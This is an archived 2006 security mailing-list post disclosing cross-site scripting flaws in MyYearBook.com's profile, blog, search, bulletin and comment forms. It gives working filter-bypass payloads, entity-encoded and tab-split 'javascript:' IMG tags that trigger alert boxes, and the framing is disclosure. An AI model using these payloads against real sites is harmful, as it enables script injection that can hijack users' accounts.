Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

MyYearBook.com - XSS

from [luny] Network Security [Permanent Link]
Subject: MyYearBook.com - XSS
Date: 25 May 2006 23:21:25 -0000 
MyYearBook.com - Personal community site like myspace.com

Effected files:

Input forms of:

editing profile
posting a blog
search boxes
posting a bulletin
posting a comment

---------------------------

XSS Vulnerabilities proof of concept:

When editing your profile, it seems <script> tags are filtered to <notallowed> 
tags, and javascript is filtered to the word not allowed. To by pass this we 
can convert the script tags or the word javascript by using hex encoding. Below 
are following examples of places where user submitted data isn't properlly 
filtered before being dynamically generated.


Profile input:

All the user has to do is put the following in any input box in his profile: 
<IMG 
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Blog subject input:

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Photo caption input:

Same as above.
<IMG SRC="jav&#x09;ascript:alert('XSS');">


Any search box input:

"><IMG SRC="jav&#x09;ascript:alert('XSS');"><"

Posting a bulletin input:

In the message input box the following works:

<IMG 
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Posting a comment:

<IMG SRC="jav   ascript:alert('XSS');">

Make sure tab is enabled.

------------------------------------------------

Luny - http://www.youfucktard.com
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • MyYearBook.com - XSS, luny <=
Previous by Date:  Re: Microsoft Internet Explorer - Crash on mouse button click, mac68k
Next by Date:  Pretty Guestbook v1, luny
Previous by Thread:  Vacation Retal Script v1.0, luny
Next by Thread:  Pretty Guestbook v1, luny
Indexes:  [Date] [Thread] [Top] [All Lists]